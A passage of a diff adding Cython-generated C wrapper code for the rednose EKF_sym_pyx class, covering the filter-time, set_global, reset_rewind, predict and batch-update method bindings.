+ __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.covs", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":124 + * return matrix_to_numpy(self.ekf.covs()) + * + * def set_filter_time(self, double t): # <<<<<<<<<<<<<< + * self.ekf.set_filter_time(t) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time = {"set_filter_time", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_9set_filter_time(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + double __pyx_v_t; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_filter_time (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_t,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 124, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set_filter_time") < 0)) __PYX_ERR(0, 124, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_t = __pyx_PyFloat_AsDouble(values[0]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 124, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set_filter_time", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 124, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.set_filter_time", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_8set_filter_time(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_t); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_8set_filter_time(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__23) + __Pyx_RefNannySetupContext("set_filter_time", 0); + __Pyx_TraceCall("set_filter_time", __pyx_f[0], 124, 0, __PYX_ERR(0, 124, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":125 + * + * def set_filter_time(self, double t): + * self.ekf.set_filter_time(t) # <<<<<<<<<<<<<< + * + * def get_filter_time(self): + */ + __pyx_v_self->ekf->set_filter_time(__pyx_v_t); + + /* "rednose/helpers/ekf_sym_pyx.pyx":124 + * return matrix_to_numpy(self.ekf.covs()) + * + * def set_filter_time(self, double t): # <<<<<<<<<<<<<< + * self.ekf.set_filter_time(t) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.set_filter_time", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":127 + * self.ekf.set_filter_time(t) + * + * def get_filter_time(self): # <<<<<<<<<<<<<< + * return self.ekf.get_filter_time() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time = {"get_filter_time", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_11get_filter_time(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_filter_time (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("get_filter_time", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "get_filter_time", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_10get_filter_time(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_10get_filter_time(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__24) + __Pyx_RefNannySetupContext("get_filter_time", 0); + __Pyx_TraceCall("get_filter_time", __pyx_f[0], 127, 0, __PYX_ERR(0, 127, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":128 + * + * def get_filter_time(self): + * return self.ekf.get_filter_time() # <<<<<<<<<<<<<< + * + * def set_global(self, str global_var, double val): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_self->ekf->get_filter_time()); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 128, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":127 + * self.ekf.set_filter_time(t) + * + * def get_filter_time(self): # <<<<<<<<<<<<<< + * return self.ekf.get_filter_time() + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.get_filter_time", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":130 + * return self.ekf.get_filter_time() + * + * def set_global(self, str global_var, double val): # <<<<<<<<<<<<<< + * self.ekf.set_global(global_var.encode('utf8'), val) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global = {"set_global", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_13set_global(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_global_var = 0; + double __pyx_v_val; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_global (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_global_var,&__pyx_n_s_val,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_global_var)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 130, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_val)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 130, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("set_global", 1, 2, 2, 1); __PYX_ERR(0, 130, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "set_global") < 0)) __PYX_ERR(0, 130, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_global_var = ((PyObject*)values[0]); + __pyx_v_val = __pyx_PyFloat_AsDouble(values[1]); if (unlikely((__pyx_v_val == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 130, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("set_global", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 130, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.set_global", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_global_var), (&PyUnicode_Type), 1, "global_var", 1))) __PYX_ERR(0, 130, __pyx_L1_error) + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_12set_global(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_global_var, __pyx_v_val); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_12set_global(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, PyObject *__pyx_v_global_var, double __pyx_v_val) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__25) + __Pyx_RefNannySetupContext("set_global", 0); + __Pyx_TraceCall("set_global", __pyx_f[0], 130, 0, __PYX_ERR(0, 130, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":131 + * + * def set_global(self, str global_var, double val): + * self.ekf.set_global(global_var.encode('utf8'), val) # <<<<<<<<<<<<<< + * + * def reset_rewind(self): + */ + if (unlikely(__pyx_v_global_var == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 131, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_global_var); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 131, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __pyx_convert_string_from_py_std__in_string(__pyx_t_1); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 131, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_v_self->ekf->set_global(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_2), __pyx_v_val); + + /* "rednose/helpers/ekf_sym_pyx.pyx":130 + * return self.ekf.get_filter_time() + * + * def set_global(self, str global_var, double val): # <<<<<<<<<<<<<< + * self.ekf.set_global(global_var.encode('utf8'), val) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.set_global", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":133 + * self.ekf.set_global(global_var.encode('utf8'), val) + * + * def reset_rewind(self): # <<<<<<<<<<<<<< + * self.ekf.reset_rewind() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind = {"reset_rewind", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_15reset_rewind(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("reset_rewind (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("reset_rewind", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "reset_rewind", 0))) return NULL; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_14reset_rewind(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_14reset_rewind(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__26) + __Pyx_RefNannySetupContext("reset_rewind", 0); + __Pyx_TraceCall("reset_rewind", __pyx_f[0], 133, 0, __PYX_ERR(0, 133, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":134 + * + * def reset_rewind(self): + * self.ekf.reset_rewind() # <<<<<<<<<<<<<< + * + * def predict(self, double t): + */ + __pyx_v_self->ekf->reset_rewind(); + + /* "rednose/helpers/ekf_sym_pyx.pyx":133 + * self.ekf.set_global(global_var.encode('utf8'), val) + * + * def reset_rewind(self): # <<<<<<<<<<<<<< + * self.ekf.reset_rewind() + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.reset_rewind", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":136 + * self.ekf.reset_rewind() + * + * def predict(self, double t): # <<<<<<<<<<<<<< + * self.ekf.predict(t) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict = {"predict", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_17predict(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + double __pyx_v_t; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("predict (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_t,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 136, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "predict") < 0)) __PYX_ERR(0, 136, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_t = __pyx_PyFloat_AsDouble(values[0]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 136, __pyx_L3_error) + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("predict", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 136, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.predict", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_16predict(((struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *)__pyx_v_self), __pyx_v_t); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_16predict(struct __pyx_obj_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx *__pyx_v_self, double __pyx_v_t) { + PyObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_TraceFrameInit(__pyx_codeobj__27) + __Pyx_RefNannySetupContext("predict", 0); + __Pyx_TraceCall("predict", __pyx_f[0], 136, 0, __PYX_ERR(0, 136, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":137 + * + * def predict(self, double t): + * self.ekf.predict(t) # <<<<<<<<<<<<<< + * + * def predict_and_update_batch(self, double t, int kind, z, R, extra_args=[[]], bool augment=False): + */ + __pyx_v_self->ekf->predict(__pyx_v_t); + + /* "rednose/helpers/ekf_sym_pyx.pyx":136 + * self.ekf.reset_rewind() + * + * def predict(self, double t): # <<<<<<<<<<<<<< + * self.ekf.predict(t) + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.predict", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":139 + * self.ekf.predict(t) + * + * def predict_and_update_batch(self, double t, int kind, z, R, extra_args=[[]], bool augment=False): # <<<<<<<<<<<<<< + * cdef vector[MapVectorXd] z_map + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] zi_b + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch = {"predict_and_update_batch", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_19predict_and_update_batch(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + double __pyx_v_t; + int __pyx_v_kind; + PyObject *__pyx_v_z = 0; + PyObject *__pyx_v_R = 0; + PyObject *__pyx_v_extra_args = 0; + bool __pyx_v_augment; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("predict_and_update_batch (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_t,&__pyx_n_s_kind,&__pyx_n_s_z,&__pyx_n_s_R,&__pyx_n_s_extra_args,&__pyx_n_s_augment,0}; + PyObject* values[6] = {0,0,0,0,0,0}; + values[4] = __pyx_k__28; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); + CYTHON_FALLTHROUGH; + case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = 